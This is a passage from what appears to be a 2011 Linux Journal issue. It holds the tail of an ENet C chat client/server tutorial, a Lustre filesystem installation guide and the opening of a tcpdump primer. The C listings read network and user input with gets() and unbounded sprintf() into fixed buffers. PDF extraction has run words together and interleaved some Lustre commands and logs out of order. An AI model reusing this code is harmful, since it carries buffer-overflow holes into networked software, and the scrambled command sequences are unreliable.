47     while (enet_host_service(client, &event, 1000) > 0) {
48       switch (event.type) {
49         case ENET_EVENT_TYPE_RECEIVE:
50           puts( (char*) event.packet->data);
51           break;
52         case ENET_EVENT_TYPE_DISCONNECT:
53           connected=0;
54           printf("You have been disconnected.\n");
55           return 2;
56       }
57     }
58     if (connected) {
59       printf("Input: ");
60       gets(buffer);
61       if (strlen(buffer) == 0) { continue; }
62       if (strncmp("q", buffer, BUFFERSIZE) == 0) {
63         connected=0;
64         enet_peer_disconnect(peer, 0);
65         continue;
66       }
67       packet = enet_packet_create(buffer, strlen(buffer)+1, ENET_PACKET_FLAG_RELIABLE);
68       enet_peer_send(peer, 0, packet);
69     }
70   }
71   enet_deinitialize();
72 }


may conflict on some systems, so the enet directory must be used. The global buffer defined on line 6 is where I will put user input. Lines 7–11 simply define some variables that the ENet library requires.

The real ENet code begins on line 18 with the call to enet_initialize(). Once the library is initialized, I create the client host on line 22. As you'll see, clients and servers are both created with a call to enet_host_create(). The only difference is that for a client, you send NULL as the first argument. For a server, this argument tells ENet what address to bind to. Because a client doesn't have to bind, you pass in NULL. The second argument sets the limit on how many connections to make room for. This example client will connect only to one server, so I pass in 1. These two arguments are the only differences between creating a client and a server!

The third argument indicates how many channels I expect to use, 0-indexed by the way. Finally, the last two arguments indicate bandwidth limitations in bits per second for upload and download, respectively. Of course, I check to see if the call to enet_host_create() was successful and continue.

Lines 27–33 tell the client what address and port the server is on and to try to connect to it. If the client can't connect, it will terminate.

If the program gets to line 34, it has connected to the server, and it's time to identify the user. The enet_host_service() function is ENet's event dispatcher, but this will be made more clear in the server code. For now, understand that all I'm doing is waiting for the server to confirm the

Listing 3.
Server Code

 1 #include <stdio.h>
 2 #include <stdlib.h>
 3 #include <string.h>
 4 #include <enet/enet.h>
 5 #include "config.h"
 6 ENetAddress address;
 7 ENetHost *server;
 8 ENetEvent event;
 9 ENetPacket *packet;
10 char buffer[BUFFERSIZE];
11 int main(int argc, char ** argv) {
12   int i;
13   if (enet_initialize() != 0) {
14     printf("Could not initialize enet.");
15     return 0;
16   }
17   address.host = ENET_HOST_ANY;
18   address.port = PORT;
19   server = enet_host_create(&address, 100, 2, 0, 0);
20   if (server == NULL) {
21     printf("Could not start server.\n");
22     return 0;
23   }
24   while (1) {
25     while (enet_host_service(server, &event, 1000) > 0) {


26       switch (event.type) {
27         case ENET_EVENT_TYPE_CONNECT:
28           break;
29         case ENET_EVENT_TYPE_RECEIVE:
30           if (event.peer->data == NULL) {
31             event.peer->data = malloc(strlen((char*) event.packet->data)+1);
32             strcpy((char*) event.peer->data, (char*) event.packet->data);
33             sprintf(buffer, "%s has connected\n", (char*) event.packet->data);
34             packet = enet_packet_create(buffer, strlen(buffer)+1, 0);
35             enet_host_broadcast(server, 1, packet);
36             enet_host_flush(server);
37           } else {
38             for (i=0; i<server->peerCount; i++) {
39               if (&server->peers[i] != event.peer) {
40                 sprintf(buffer, "%s: %s",
41                   (char*) event.peer->data, (char*) event.packet->data);
42                 packet = enet_packet_create(buffer, strlen(buffer)+1, 0);
43                 enet_peer_send(&server->peers[i], 0, packet);
44                 enet_host_flush(server);
45               } else {
46               }
47             }
48           }
49           break;
50         case ENET_EVENT_TYPE_DISCONNECT:
51           sprintf(buffer, "%s has disconnected.", (char*) event.peer->data);
52           packet = enet_packet_create(buffer, strlen(buffer)+1, 0);
53           enet_host_broadcast(server, 1, packet);
54           free(event.peer->data);
55           event.peer->data = NULL;
56           break;
57         default:
58           printf("Tick tock.\n");
59           break;
60       }
61     }
62   }
63   enet_host_destroy(server);
64   enet_deinitialize();
65 }


connection so you can identify yourself. If you don't see the ENET_EVENT_TYPE_CONNECT, you know you didn't really get connected and should terminate. On lines 38–41, I create and send a packet to the server that simply contains the user's name. (I'll have more to say about packets when I examine the server code.)

The rest of the program, from line 46, is the main event loop. (I'll discuss enet_host_service() and the switch statement that follows it in more detail when I discuss the server.) The code starting from line 58 is fairly simple. Here I get input from the user and check if it's an empty line or if it's a line with just a q on it. Otherwise, I create a packet and send it. Obviously, I never really get to line 71, but I included it for instructional purposes.

The client really isn't very difficult to write and understand. As you're about to see, the server code is almost identical. Let's take a look at the server code in Listing 3.

As you can see, the first 24 lines of code are almost identical to those found in the client code, with two notable exceptions. On lines 17–19, I tell the server to bind to the default IP address, 0.0.0.0, and allocate space for up to 100 client connections. In this case, I don't set any limits on bandwidth utilization.

On line 25, I call enet_host_service() until it returns 0. Each time enet_host_service() returns a nonzero value, I know that something has happened, and the switch statement that follows is used to determine what happened. Note the third argument indicates how many milliseconds to wait for something to happen. If I had passed a 0 in this argument, the call to enet_host_service() would be completely nonblocking.

The ENET_EVENT_TYPE_CONNECT event indicates that a client has connected to the server. Normally, you'd want to initialize resources for the client. But in this case, there is nothing to do until the client has identified itself. I left this case intact for
I left this case intact forinstructional purposes.THE CLIENT REALLY ISN’T VERY DIFFICULT TO WRITE AND UNDERSTAND.AS YOU’RE ABOUT TO SEE, THE SERVER CODE IS ALMOST IDENTICAL.The ENET_EVENT_TYPE_RECEIVE eventis dispatched when the server receives amessage from a client. For this event, thereare two possible scenarios:1. The client hasn’t identified itself yet,and this is the first message I’ve receivedfrom them.2. The client has been identified, and this is anormal chat message.I check to see which is the case in theconditional on line 30. This line also pointsout an issue that comes up in the forumsfrom time to time, so I’ll explain it in a bitmore detail.Most server applications have to store atleast some information about each client.Typically, they use an array of structures to78 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


store this information. Intuition tells you that one of the things you should store in a given client's structure is a pointer to whatever data type allows you to communicate with it. But with ENet, that intuition is wrong. Instead, ENet's peer data type provides a field, data, that you can use to store a pointer. This pointer presumably would point to the client's information structure. So, it's almost backward from what you expect. But, this is kind of an elegant solution; ENet manages its data, and you manage yours, separately.

The only client data that you care about is the name of the user associated with a given client. If you don't already have the user's name, and you receive a message from his or her client, you can assume that the client is identifying itself to you and you should store the user's name. I do this in lines 31 and 32. Then, in lines 33–36, I announce the new user to the rest of the clients. Note that I create a packet on line 34, but the call to enet_host_broadcast() deallocates it. It is a major error to deallocate that data structure yourself.

In lines 37–49, you can see the case where the client already is identified. All you have to do is send a message to the other clients indicating the name of the "speaker" and what he or she "said". To do this, you loop over ENet's list of peers. For each peer, check to see if it's the same peer that sent the message. If it is, you skip it, as people really don't want their own messages echoed back to them. Otherwise, you create a message and send it. This way, each client knows what was said, and by whom.

The ENET_EVENT_TYPE_DISCONNECT event indicates that a client has disconnected. In this case, you announce that the user has disconnected and deallocate the space used to store the user's name. On line 55, I set the data
On line 55, I set the datapointer back to NULL just in case ENetdecides to re-use this structure whenanother client connects.If no event is received, the default case isexecuted, and the server simply prints “Ticktock” to the console, as a reassurance thatit is still running.And, there you have it—a chat client in 72lines of code and a multi-user chat server in65 lines of code, and much of the code wasidentical. In fact, in the program upon whichthis code is based, I actually use identicalcode for both the client and server. Ratherthan have a block of code in the switchstatement, I simply call an event handler,which is implemented in a separate codemodule, one for the client and one for theserver. Then, depending on which module Ilink against, I can have a client or a server.This has the added benefit of isolating all ofthe ENet-specific code in one source file.As you can see, the ENet library is almosttrivial to use, but it encapsulates sophisticatednetwork communications capabilities. Ofcourse, what this really means is that it’sjust fun to use.■Mike Diehl operates Diehlnet Communications, LLC, a small IPphone company. Mike lives in Albuquerque, New Mexico, with hiswife and three sons. He can be reached at mdiehl@diehlnet.com.WWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 79


THE LUSTRE DISTRIBUTED FILESYSTEM

DEPLOY A SCALABLE AND HIGH-PERFORMING DISTRIBUTED FILESYSTEM IN YOUR CLUSTERED ENVIRONMENT WITH LUSTRE.

There comes a time in a network or storage administrator's career when a large collection of storage volumes needs to be pooled together and distributed within a clustered or multiple-client network, while maintaining high performance with little to no bottlenecks when accessing the same files. That is where Lustre comes into the picture. The Lustre filesystem is a high-performance distributed filesystem intended for larger network and high-availability environments.

PETROS KOUTOUPIS


The Storage Area Network and Linux

Traditionally, Lustre is configured to manage remote data storage disk devices within a Storage Area Network (SAN), which is two or more remotely attached disk devices communicating via a Small Computer System Interface (SCSI) protocol. This includes Fibre Channel, Fibre Channel over Ethernet (FCoE), Serial Attached SCSI (SAS) and even iSCSI. To better explain what a SAN is, it may be more beneficial to begin with what it isn't. For instance, a SAN shouldn't be confused with a Local Area Network (LAN), even if that LAN carries storage traffic (that is, via networked filesystem shares and so on). Only if the LAN carries storage traffic using the iSCSI or FCoE protocols can it then be considered a SAN. Another thing that a SAN isn't is Network Attached Storage (NAS). Again, the SAN relies heavily on a SCSI protocol, while the NAS uses the NFS and SMB/CIFS file-sharing protocols.

An external storage target device will represent storage volumes as Logical Units within the SAN. Typically, a set of Logical Units will be mapped across a SAN to an initiator node—in our case, it would be the server(s) managing the Lustre filesystem. In turn, the server(s) will identify one or more SCSI disk devices within its SCSI subsystem and treat them as if they were local drives. The amount of SCSI disks identified is determined by the amount of Logical Units mapped to the initiator.

If you want to follow along with the examples here, it is relatively simple to configure a couple virtual machines: one as the server node with one or more additional disk devices to export and the second to act as a client node and mount
Although itis bad practice, fortesting purposes,it also is possibleto have a singlevirtual machineconfigured as bothserver and client.SCSISCSI is an ANSIstandardizedhardwareand softwarecomputinginterfaceadopted by allearly storageThe Distributedmanufacturers.FilesystemRevisedA distributededitions offilesystem allowsthe standardaccess to files frommultiple hostscontinue to besharing a computer used today.network. Thismakes it possiblefor multiple users on multiple client nodesto share files and storage resources. Theclient nodes do not have direct access to theunderlying block storage but interact over thenetwork using a protocol and, thus, make itpossible to restrict access to the filesystemdepending on access lists or capabilities onboth the servers and the clients, unlike aclustered filesystem, where all nodes haveequal access to the block storage where thefilesystem is located. On these systems, theaccess control must reside on the client. Otheradvantages to utilizing distributed filesystemsinclude the fact that they may involve facilitiesfor transparent replication and fault tolerance.So, when a limited number of nodes in afilesystem goes off-line, the system continuesWWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 81


FEATURE The Lustre Distributed Filesystem

to work without any data loss.

Lustre (or Linux Cluster) is one such distributed filesystem, usually deployed for large-scale cluster computing. Licensed under the GNU General Public License (or GPL), Lustre provides a solution in which high performance and scalability to tens of thousands of nodes and petabytes of storage becomes a reality and is relatively simple to deploy and configure. Despite the fact that Lustre 2.0 has been released, for this article, I work with the generally available 1.8.5.

Lustre contains a somewhat unique architecture, with three major functional units. One is a single metadata server or MDS that contains a single metadata target or MDT for each Lustre filesystem. This stores namespace metadata, which includes filenames, directories, access permissions and file layout. The MDT data is stored in a single disk filesystem mapped locally to the serving node and is a dedicated filesystem that controls file access and informs the client node(s) which object(s) make up a file. Second are one or more object storage servers (OSSes) that store file data on one or more object storage targets or OSTs. An OST is a dedicated object-based filesystem exported for read/write operations. The capacity of a Lustre filesystem is determined by the sum of the total capacities of the OSTs. Finally, there's the client(s) that accesses and uses the file data.

Lustre presents all clients with a unified namespace for all of the files and data in the filesystem that allows concurrent and coherent read and write access to the files in the filesystem. When a client accesses a file, it completes a filename lookup on the MDS, and either a new file is created or the layout of an existing file is returned to the client. Locking the file on the OST, the client will then run one or more read or write operations to the file but will not directly modify the objects on the OST. Instead, it will delegate tasks to the OSS.
This approach will ensure scalability and improved security and reliability, as it does not allow direct access to the underlying storage, which would increase the risk of filesystem corruption from misbehaving/defective clients.

Although all three components (MDT, OST and client) can run on the same node, they typically are configured on separate nodes communicating over a network (see the details on LNET later in this article). In this example, I'm running the MDT and OST on a single server node while the client will be accessing the OST from a separate node.

Installing Lustre

To obtain Lustre 1.8.5, download the prebuilt binaries packaged in RPMs, or download the source and build the modules and utilities for your respective Linux distribution. Oracle provides server RPM packages for both Oracle Enterprise Linux (OEL) 5 and Red Hat Enterprise Linux (RHEL) 5, while also providing client RPM packages for OEL 5, RHEL 5 and SUSE Linux Enterprise Server (SLES) 10,11.

If you will be building Lustre from source, ensure that you are using a Linux kernel 2.6.16 or greater. Note that in all deployments of Lustre, the server that runs on an MDS, MGS (discussed below) or OSS must utilize a patched kernel. Running a patched kernel on


a Lustre client is optional and required only if the client will be used for multiple purposes, such as running as both a client and an OST.

If you already have a supported operating system, make sure that the patched kernel, lustre-modules, lustre-ldiskfs (a Lustre-patched backing filesystem kernel module package for the ext3 filesystem), lustre (which includes userspace utilities to configure and run Lustre) and e2fsprogs packages are installed on the host system while also resolving its dependencies from a local or remote repository. Use the rpm command to install all necessary packages:

$ sudo rpm -ivh kernel-2.6.18-194.3.1.0.1.el5_lustre.1.8.4.i686.rpm
$ sudo rpm -ivh lustre-modules-1.8.4-2.6.18_194.3.1.0.1.el5_lustre.1.8.4.i686.rpm
$ sudo rpm -ivh lustre-ldiskfs-3.1.3-2.6.18_194.3.1.0.1.el5_lustre.1.8.4.i686.rpm
$ sudo rpm -ivh lustre-1.8.4-2.6.18_194.3.1.0.1.el5_lustre.1.8.4.i686.rpm
$ sudo rpm -ivh e2fsprogs-1.41.10.sun2-0redhat.oel5.i386.rpm

View the /boot/grub/grub.conf file to validate that the newly installed kernel has been set as the default kernel. Now that all packages have been installed, a reboot is required to load the new kernel image. Once the system has been rebooted, an invocation of the uname command will reveal the currently booted kernel image:

[petros@lustre-host ~]$ uname -a
Linux lustre-host 2.6.18-194.3.1.0.1.el5_lustre.1.8.4 #1 SMP Mon Jul 26 22:12:56 MDT 2010 i686 i686 i386 GNU/Linux

Meanwhile, on the client side, the packages for the lustre-client (utilities for patchless clients) and lustre-client-modules (modules for patchless clients) need to be installed on all desired client machines:

$ sudo rpm -ivh lustre-client-1.8.4-2.6.18_194.3.1.0.1.el5_lustre.1.8.4.i686.rpm
$ sudo rpm -ivh lustre-client-modules-1.8.4-2.6.18_194.3.1.0.1.el5_lustre.1.8.4.i686.rpm

After these packages have been installed, list the boot directory to reveal the newly installed patched Linux kernel:

[petros@lustre-host ~]$ ls
/boot/
config-2.6.18-194.3.1.0.1.el5_lustre.1.8.4
grub
initrd-2.6.18-194.3.1.0.1.el5_lustre.1.8.4.img
lost+found
symvers-2.6.18-194.3.1.0.1.el5_lustre.1.8.4.gz
System.map-2.6.18-194.3.1.0.1.el5_lustre.1.8.4
vmlinuz-2.6.18-194.3.1.0.1.el5_lustre.1.8.4

Note that these client machines need to be within the same network as the host machine serving the Lustre filesystem. After the packages are installed, reboot all affected client machines.

Configuring Lustre Server

In order to configure the Lustre filesystem, you need to configure Lustre Networking, or LNET, which provides the communication infrastructure required by the Lustre filesystem. LNET supports many commonly used network types, which include InfiniBand and IP


FEATURE The Lustre Distributed Filesystemnetworks. It allows simultaneous availabilityacross multiple network types with routingbetween them. In this example, let’s use tcp,so use your favorite editor to append thefollowing line to the /etc/modprobe.conf file:options lnet networks=tcpThis step restricts LNET to be usingonly the specified network interfaces andprevents LNET from using all networkinterfaces.Before moving on, it is important todiscuss the role of the Management Serveror MGS. The MGS stores configurationinformation for all Lustre filesystems in aclustered setup. An OST contacts the MGSto provide information, while the client(s)contact the MGS to retrieve information.The MGS requires its own disk for storage,although there is a provision that allowsthe MGS to share a disk with a single MDT.Type the following command to create acombined MGS/MDT node:[petros@lustre-host ~]$ sudo /usr/sbin/mkfs.lustre--fsname=lustre --mgs --mdt /dev/sda1Permanent disk data:Target:Index:Lustre FS:lustre-MDTffffunassignedlustreMount type: ldiskfsFlags:0x75Try Before You Buy!Benchmark Your Code on Our GPU Cluster withAMBER, NAMD, or Custom CUDA CodesConfigure your WhisperStation or Cluster today!www.microway.com/tesla or 508-746-7341NEW Microway MD SimCluster with8 Tesla M2090 GPUs, 8 CPUs and InfiniBand30% Improvement Over Previous TeslasGSA ScheduleContract Number:GS-35F-0431N


            (MDT MGS needs_index first_time update )
Persistent mount opts: iopen_nopriv,user_xattr,errors=remount-ro
Parameters: mdt.group_upcall=/usr/sbin/l_getgroups

device size = 1019MB
2 6 18
formatting backing filesystem ldiskfs on /dev/sda1
        target name  lustre-MDTffff
        4k blocks    261048
        options      -i 4096 -I 512 -q -O dir_index,uninit_groups -F
mkfs_cmd = mke2fs -j -b 4096 -L lustre-MDTffff -i 4096 -I 512 -q -O dir_index,uninit_groups -F /dev/sda1 261048
Writing CONFIGS/mountdata

If nothing has been provided, by default, the fsname is lustre. If one or more of these filesystems are created, it is necessary to use unique names for each labeled volume. These names become very important for when you access the target on the client system.

Create the OST by executing the following command:

[petros@lustre-host ~]$ sudo /usr/sbin/mkfs.lustre --ost --fsname=lustre --mgsnode=10.0.2.15@tcp0 /dev/sda2

   Permanent disk data:
Target:     lustre-OSTffff
Index:      unassigned
Lustre FS:  lustre
Mount type: ldiskfs
Flags:      0x72
            (OST needs_index first_time update )
Persistent mount opts: errors=remount-ro,extents,mballoc


FEATURE The Lustre Distributed FilesystemParameters: mgsnode=10.0.2.15@tcpchecking for existing Lustre data: not founddevice size = 1027MB2 6 18formatting backing filesystem ldiskfs on /dev/sda2target name lustre-OSTffff4k blocks 263064options -J size=40 -i 16384 -I 256 -q -Odir_index,extents,uninit_groups -Fmkfs_cmd = mke2fs -j -b 4096 -L lustre-OSTffff-J size=40 -i 16384 -I 256 -q -Odir_index,extents,uninit_groups -F /dev/sda2 263064Writing CONFIGS/mountdataThe /var/log/messages file will log thefollowing messages:Jun 25 10:26:54 lustre-host kernel: Lustre: lustre-MDT0000:new disk, initializingJun 25 10:26:54 lustre-host kernel: Lustre: lustre-MDT0000:Now serving lustre-MDT0000 on /dev/sda1 with recovery enabledJun 25 10:26:54 lustre-host kernel: Lustre:3285:0:(lproc_mds.c:271:lprocfs_wr_group_upcall())lustre-MDT0000: group upcall set to /usr/sbin/l_getgroupsJun 25 10:26:54 lustre-host kernel: Lustre: lustre-MDT0000.mdt:set parameter group_upcall=/usr/sbin/l_getgroupsMount the OST:When the target needs to provideinformation to the MGS or when the clientaccesses the target for information lookup,all also will need to be aware of where theMGS is, which you have defined for thistarget as the server’s IP address followed bythe network interface for communication.This is just a reminder that the interface wasdefined earlier in the /etc/modprobe.conf file.Now you easily can mount thesenewly formatted devices local to the hostmachine. 
Mount the MDT:[petros@lustre-host ~]$ sudo mkdir -p /mnt /ost[petros@lustre-host ~]$ sudo mount -t lustre /dev/sda2 /mnt/ost/Verify that it is mounted with the dfcommand:[petros@lustre-host ~]$ df -t lustreFilesystem 1K-blocks Used Available Use% Mounted on/dev/sda1 913560 17768 843584 3% /mnt/mdt/dev/sda2 1035692 42460 940620 5% /mnt/ostThe /var/log/messages file will log thefollowing messages:[petros@lustre-host ~]$ sudo mkdir -p /mnt /mdt[petros@lustre-host ~]$ sudo mount -t lustre /dev/sda1 /mnt/mdt/Verify that it is mounted with the dfcommand:[petros@lustre-host ~]$ df -t lustreFilesystem 1K-blocks Used Available Use% Mounted on/dev/sda1 913560 17752 843600 3% /mnt/mdtJun 25 10:41:33 lustre-host kernel: Lustre:lustre-OST0000: new disk, initializingJun 25 10:41:33 lustre-host kernel: Lustre:lustre-OST0000: Now serving lustre-OST0000 on/dev/sda2 with recovery enabledJun 25 10:41:39 lustre-host kernel: Lustre:3417:0:(mds_lov.c:1155:mds_notify()) MDS lustre-MDT0000:add target lustre-OST0000_UUID86 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


FAILOVER

Failover is a process with the capability to switch over automatically to a redundant or standby computer server, system or network upon the failure or abnormal termination of the previously active application, server, system or network. Many failover solutions exist on the Linux platform to cover both SAN and LAN environments.

Jun 25 10:41:39 lustre-host kernel: Lustre: 3188:0:(quota_master.c:1716:mds_quota_recovery()) Only 0/1 OSTs are active, abort quota recovery
Jun 25 10:41:39 lustre-host kernel: Lustre: lustre-OST0000: received MDS connection from 0@lo
Jun 25 10:41:39 lustre-host kernel: Lustre: MDS lustre-MDT0000: lustre-OST0000_UUID now active, resetting orphans

Even though they are mounted like typical filesystems, you will notice that the MDT and OST labeled volumes do not contain the typical filesystem characteristics. That is where the client will come into play:

[petros@lustre-host ~]$ ls /mnt/ost/
ls: /mnt/ost/: Not a directory
[petros@lustre-host ~]$ sudo ls /mnt/ost/
ls: /mnt/ost/: Not a directory
[petros@lustre-host ~]$ sudo ls -l /mnt/
total 4
d--------- 1 root root 0 Jun 25 10:22 mdt
d--------- 1 root root 0 Jun 25 10:22 ost

Configuring Lustre Client(s)

Remember that you named the Lustre-enabled volume lustre. This can be observed below following the network method (tcp0) by which you are mounting the remote volume. Again, TCP was defined in the /etc/modprobe.conf file for the supported LNET network interfaces:

[petros@client1 ~]$ sudo mkdir -p /lustre
[petros@client1 ~]$ sudo mount -t lustre 10.0.2.15@tcp0:/lustre /lustre/

After successfully mounting the remote volume, you will see the /var/log/messages file append:

Jun 25 10:44:17 client1 kernel: Lustre: Client lustre-client has started

Use df to list the mounted Lustre-enabled volumes:
When you mount the volume over the network on the client node, you must specify this name:

[petros@client1 ~]$ df -t lustre
Filesystem              1K-blocks   Used  Available  Use%  Mounted on
10.0.2.15@tcp0:/lustre    1035692  42460     940556    5%  /lustre

Once mounted, the filesystem now


can be accessed by the client node. For instance, you can now read or write from or to files located on the mounted OST. In the following example, let's write approximately 40MB of data to a new file on /lustre:

[petros@client1 lustre]$ sudo dd if=/dev/zero of=/lustre/test.dat bs=4M count=10
10+0 records in
10+0 records out
41943040 bytes (42 MB) copied, 1.30103 seconds, 32.2 MB/s

A df listing will reflect the changes of available and used capacities to the /lustre mountpoint:

[petros@client1 lustre]$ df -t lustre
Filesystem              1K-blocks   Used  Available  Use%  Mounted on
10.0.2.15@tcp0:/lustre    1035692  83420     899596    9%  /lustre

[petros@client1 lustre]$ ls -l
total 40960
-rw-r--r-- 1 root root 41943040 Jun 25 10:47 test.dat

Summary

Although I covered a simple introduction and tutorial of the Lustre distributed filesystem, there still is so much uncharted territory and methods by which the filesystem can be configured for a truly rich computing environment. For instance, Lustre can be configured for high availability to ensure that in the situation of failure, the system's services continue without interruption. That is, the accessibility between the client(s), server(s) and external target storage is always made available through a process called failover. Additional HA is provided through an implementation of disk drive redundancy in some sort of RAID (hardware or software via mdadm) configuration for the event of drive failures. These high-availability techniques normally would apply to server nodes hosting the MDS and OSS. It is suggested to place the OST storage on a RAID 5 or, preferably, RAID 6, while the MDT storage should be RAID 1 or RAID 0+1.

It isn't a difficult technology to work with; however, there still exists an entire community with excellent administrator and developer resources ranging from articles, mailing lists and more to aid the novice in installing and maintaining a Lustre-enabled system.
Commercial support for Lustre is made available by a non-exhaustive list of vendors selling bundled computing and Lustre storage systems. Many of these same vendors also are contributing to the Open Source community surrounding the Lustre Project.■

Petros Koutoupis is a full-time Linux kernel, device-driver and application developer for embedded and server platforms. He has been working in the data storage industry for more than seven years and enjoys discussing the same technologies.

Resources

Lustre Project Page: wiki.lustre.org/index.php

Wikipedia: Lustre: en.wikipedia.org/wiki/Lustre_(file_system)

Wikipedia: Distributed File Systems: en.wikipedia.org/wiki/Distributed_file_system




tcpdump fu

Unleash the power and convenience of the original, venerable, command-line network analysis utility.

HENRY VAN STYN


Packet capture is one of the most fundamental and powerful ways to do network analysis. You can learn virtually anything about what is going on within a network by intercepting and examining the raw data that crosses it. Modern network analysis tools are able to capture, interpret and describe this network traffic in a human-friendly manner.

tcpdump is one of the original packet capture (or "sniffing") tools that provide these analysis capabilities, and even though it now shares the field with many other utilities, it remains one of the most powerful and flexible.

If you think that tcpdump has been made obsolete by GUI tools like Wireshark, think again. Wireshark is a great application; it's just not the right tool for the job in every situation. As a refined, universal, lightweight command-line utility (much like cat, less and hexdump), tcpdump satisfies a different type of need.

One of tcpdump's greatest strengths is its convenience. It uses a "one-off-command" approach that lends itself to quick, on-the-spot answers. It works through an SSH session, doesn't need X and is more likely to be there when you need it. And, because it uses standard command-line conventions

The tcpdump/libpcap Legacy

tcpdump has been the de facto packet capture tool for the past 25 years. It really did spawn the whole genre of network utilities based on sniffing and analyzing packets. Prior to tcpdump, packet capture had such high processing demands that it was largely impractical. tcpdump introduced some key innovations and optimizations that helped make packet capture more viable, both for regular systems and for networks with a lot of traffic.

The utilities that came along afterward not only followed tcpdump's lead, but also directly incorporated its packet capture functionality.
This was possible because very early on, tcpdump's authors decided to move the packet capture code into a separate portable library called libpcap.

Wireshark, ntop, snort, iftop, ngrep and hundreds of other applications and utilities available today are all based on libpcap. Even most packet capture applications for Windows are based on a port of libpcap called WinPcap.
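Because every libpcap-based tool shares one on-disk capture format, even a few lines of code can read the files these utilities produce. As a rough illustration (added here; Python rather than the C library itself), the 24-byte pcap global header can be unpacked with the struct module. This sketch handles only little-endian files; a real reader would also accept the byte-swapped and nanosecond-resolution magic numbers.

```python
import struct

# The classic pcap global header: magic number, version major/minor,
# timezone offset, timestamp accuracy, snaplen, link-layer type.
PCAP_GLOBAL_HDR = struct.Struct("<IHHiIII")
PCAP_MAGIC_LE = 0xA1B2C3D4

def parse_pcap_header(data: bytes) -> dict:
    """Parse the 24-byte pcap global header (little-endian files only)."""
    magic, vmaj, vmin, thiszone, sigfigs, snaplen, linktype = \
        PCAP_GLOBAL_HDR.unpack(data[:PCAP_GLOBAL_HDR.size])
    if magic != PCAP_MAGIC_LE:
        raise ValueError("not a little-endian pcap file")
    return {"version": (vmaj, vmin), "snaplen": snaplen, "linktype": linktype}

# A synthetic header like the one tcpdump -w would write:
# format version 2.4, snaplen 65535, linktype 1 (Ethernet).
hdr = PCAP_GLOBAL_HDR.pack(PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, 1)
print(parse_pcap_header(hdr))
```

Everything after this fixed header is a sequence of per-packet records, which is why the same file opens equally well in tcpdump, Wireshark or anything else built on libpcap.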


(such as writing to STDOUT, which can be redirected), tcpdump can be used in all sorts of creative, interesting and extremely useful ways.

In this article, I introduce some of the basics of packet capture and provide a breakdown of tcpdump syntax and usage. I show how to use tcpdump to zero in on specific packets and reveal the useful information they contain. I provide some real-world examples of how tcpdump can help put the details of what's happening on your network at your fingertips, and why tcpdump is still a must-have in any admin's toolbox.

Essential Concepts

Before you can begin to master tcpdump, you should understand some of the fundamentals that apply to using all packet sniffers:

■ Packet capturing is passive; it doesn't transmit or alter network traffic.

■ You can capture only the packets that your system receives. On a typical switched network, that excludes unicast traffic between other hosts (packets not sent to or from your machine).

■ You can capture only packets addressed to your system, unless the network interface is in promiscuous mode.

It is assumed that you're interested in seeing more than just your local traffic, so tcpdump turns on promiscuous mode automatically (which requires root privileges). But, in order for your network card to receive the packets in the first place, you still have to be where the traffic is, so to speak.

Anatomy of a tcpdump Command

A tcpdump command consists of two parts: a set of options followed by a filter expression (Figure 1).

Figure 1.
Example tcpdump Command

The expression identifies which packets to capture, and the options define, in part, how those packets are displayed, as well as other aspects of program behavior.

Options

tcpdump options follow the standard command-line flag/switch syntax conventions. Some flags accept a parameter, such as -i to specify the capture interface, while others are standalone switches and can be clustered, such as -v to increase verbosity and -n to turn off name resolution.

The man page for tcpdump lists all available options, but here are a few of the noteworthy ones:

■ -i interface: interface to listen on.

■ -v, -vv, -vvv: more verbose.

■ -q: less verbose.


■ -e: print link-level (Ethernet) headers.

■ -N: display relative hostnames.

■ -t: don't print timestamps.

■ -n: disable name lookups.

■ -s0 (or -s 0): use the max "snaplen": capture full packets (the default in recent versions of tcpdump).

None of these is required. User-supplied options simply modify the default program behavior, which is to capture from the first interface, and then print descriptions of matching packets on the screen in a single-line format.

Filter Expression

The filter expression is the Boolean (true or false) criteria for "matching" packets. All packets that do not match the expression are ignored.

The filter expression syntax is robust and flexible. It consists primarily of keywords called primitives, which represent various packet-matching qualifiers, such as protocol, address, port and direction. These can be chained together with and/or, grouped and nested with parentheses, and negated with not to achieve virtually any criteria.

Because the primitives have friendly names and do a lot of the heavy lifting, filter expressions are generally self-explanatory and easy to read and construct. The syntax is fully described in the pcap-filter man page, but here are a few example filter expressions:

■ tcp

■ port 25 and not host 10.0.0.3

■ icmp or arp or udp

■ vlan 3 and ether src host aa:bb:cc:dd:ee:ff

■ arp or udp port 53

■ icmp and \(dst host mrorange or dst host mrbrown\)

Like the options, filter expressions are not required. An empty filter expression simply matches all packets.

Understanding tcpdump Output

How much sense the output makes depends on how well you understand the protocols in question. tcpdump tailors its output to match the protocol(s) of the given packet. For example, ARP packets are displayed like this when tcpdump is called with -t and -n (timestamps and name lookups turned off):

arp who-has 10.0.0.1 tell 10.0.0.2
arp reply 10.0.0.1 is-at 00:01:02:03:04:05

ARP is a simple protocol used to resolve IPs into MAC addresses.
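The decoding tcpdump applies to ARP is simple enough to sketch by hand. The following Python fragment (an illustration added here, not tcpdump's actual code) unpacks a 28-byte ARP payload with struct and prints it in the same who-has/is-at style:

```python
import struct

def describe_arp(payload: bytes) -> str:
    """Decode a 28-byte Ethernet/IPv4 ARP payload into tcpdump-like text."""
    (htype, ptype, hlen, plen, oper,
     sha, spa, tha, tpa) = struct.unpack("!HHBBH6s4s6s4s", payload[:28])
    src_ip = ".".join(map(str, spa))
    dst_ip = ".".join(map(str, tpa))
    if oper == 1:  # opcode 1 = request, 2 = reply
        return f"arp who-has {dst_ip} tell {src_ip}"
    mac = ":".join(f"{b:02x}" for b in sha)
    return f"arp reply {src_ip} is-at {mac}"

# A synthetic request: 10.0.0.2 asking for 10.0.0.1's MAC address.
request = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, 1,
                      bytes(6), bytes([10, 0, 0, 2]),
                      bytes(6), bytes([10, 0, 0, 1]))
print(describe_arp(request))  # arp who-has 10.0.0.1 tell 10.0.0.2
```

The one-line summary per packet falls straight out of the fixed-layout header, which is why tcpdump's ARP output can be so terse.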
As you can see above, tcpdump describes these packets in a correspondingly simple format. DNS packets, on the other hand, are displayed


completely differently:

IP 10.0.0.2.50435 > 10.0.0.1.53: 19+ A? linuxjournal.com. (34)
IP 10.0.0.1.53 > 10.0.0.2.50435: 19 1/0/0 A 76.74.252.198 (50)

